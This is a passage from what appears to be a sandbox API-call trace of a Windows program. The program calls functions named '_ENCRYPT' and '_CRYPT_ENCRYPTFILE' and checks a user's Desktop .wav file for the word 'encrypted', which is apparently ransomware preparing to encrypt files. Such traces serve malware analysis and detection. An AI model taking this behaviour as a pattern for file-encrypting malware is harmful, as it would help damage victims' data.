cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0029.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.521] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.522] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.522] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.522] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.522] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.522] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.522] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.522] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.522] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0029.523] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.523] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.523] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x5a88f350, ftLastWriteTime.dwHighDateTime=0x1d5b9ed, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x0, dwReserved1=0x777648, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 0x7c20c0 [0029.523] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.523] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.523] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.524] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.524] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8e0440, ftCreationTime.dwHighDateTime=0x1d5befa, ftLastAccessTime.dwLowDateTime=0x5a88f350, ftLastAccessTime.dwHighDateTime=0x1d5b9ed, ftLastWriteTime.dwLowDateTime=0x5a88f350, ftLastWriteTime.dwHighDateTime=0x1d5b9ed, nFileSizeHigh=0x0, nFileSizeLow=0x14d27, dwReserved0=0x0, dwReserved1=0x777648, cFileName="32U39klehZ.wav", cAlternateFileName="32U39K~1.WAV")) returned 0x7c20c0 [0029.524] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.524] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.524] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.525] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.525] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.525] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.525] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="32U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="39klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lehZ.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0029.527] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.527] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.527] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.527] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af7c8 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.528] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.528] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 